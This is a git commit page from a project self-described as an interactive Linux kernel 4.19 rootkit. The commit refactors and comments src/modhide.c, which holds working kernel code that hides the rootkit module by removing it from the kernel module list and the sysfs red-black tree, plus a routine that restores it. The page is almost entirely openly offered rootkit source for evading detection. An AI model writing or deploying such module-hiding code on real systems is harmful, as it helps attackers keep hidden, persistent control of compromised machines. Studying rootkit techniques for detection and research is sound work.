linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit b1cbc6685d1974696f11fcb6d22e9df33cfcf855
parent 38e96b8b1acc57788cdb2433879a4713e4e583f5
Author: deurzen <m.deurzen@tum.de>
Date:   Sat,  5 Dec 2020 23:10:35 +0100

refactors code, adds documentation

Diffstat:

Msrc/modhide.c | 27+++++++++++++++------------


1 file changed, 15 insertions(+), 12 deletions(-)

diff --git a/src/modhide.c b/src/modhide.c
@@ -9,9 +9,12 @@
 
 static struct list_head *mod;
 
+// https://elixir.bootlin.com/linux/v4.19/source/include/linux/module.h#L334
+// https://elixir.bootlin.com/linux/v4.19/source/include/linux/kobject.h#L71
 void
 hide_module(void)
 {
+    // sysfs directory entry
     struct kernfs_node *sd;
 
     if (mod)
@@ -20,15 +23,18 @@ hide_module(void)
     mod = THIS_MODULE->list.prev;
     sd = THIS_MODULE->mkobj.kobj.sd;
 
-    list_del(&THIS_MODULE->list);
+    // remove from the RB tree of modules
     rb_erase(&sd->rb, &sd->parent->dir.children);
-    /* sd->rb.__rb_parent_color = (unsigned long)(&sd->rb); */
+
+    // remove from the list of modules
+    list_del(&THIS_MODULE->list);
 }
 
+// https://elixir.bootlin.com/linux/v4.19/source/include/linux/module.h#L334
+// https://elixir.bootlin.com/linux/v4.19/source/include/linux/kobject.h#L71
 void
 unhide_module(void)
 {
-    int res;
     struct kernfs_node *sd;
     struct rb_root *root;
     struct rb_node *parent;
@@ -42,13 +48,15 @@ unhide_module(void)
     new = &root->rb_node;
     parent = NULL;
 
+    // add back to the list of modules
     list_add(&THIS_MODULE->list, mod);
 
     { // Insert our module back into the RB tree of modules
         // Search for the place to insert, insert, then rebalance tree,
         // as per https://www.kernel.org/doc/Documentation/rbtree.txt
         while (*new) {
-            static struct kernfs_node *rb;
+            int cmp;
+            struct kernfs_node *rb;
 
             parent = *new;
             rb = rb_entry(*new, struct kernfs_node, rb);
@@ -56,18 +64,16 @@ unhide_module(void)
             // https://elixir.bootlin.com/linux/v4.19/source/include/linux/kernfs.h#L132
             // Determine insert position based on 1. hash,
             // 2. (upon collision) namespace, and 3. (otherwise) name
-            res = (sd->hash == rb->hash)
+            cmp = (sd->hash == rb->hash)
                 ? ((sd->ns == rb->ns)
                     ? strcmp(sd->name, rb->name)
                     : sd->ns - rb->ns)
                 : sd->hash - rb->hash;
 
-            if (res < 0)
+            if (cmp < 0)
                 new = &((*new)->rb_left);
-                /* new = &(rb->rb.rb_left); */
-            else if (res > 0)
+            else if (cmp > 0)
                 new = &((*new)->rb_right);
-                /* new = &(rb->rb.rb_right); */
             else
                 return;
         }
@@ -76,8 +82,5 @@ unhide_module(void)
         rb_insert_color(&sd->rb, root);
     }
 
-	/* if (kernfs_type(sd) == KERNFS_DIR) */
-	/* 	++sd->parent->dir.subdirs; */
-
     mod = NULL;
 }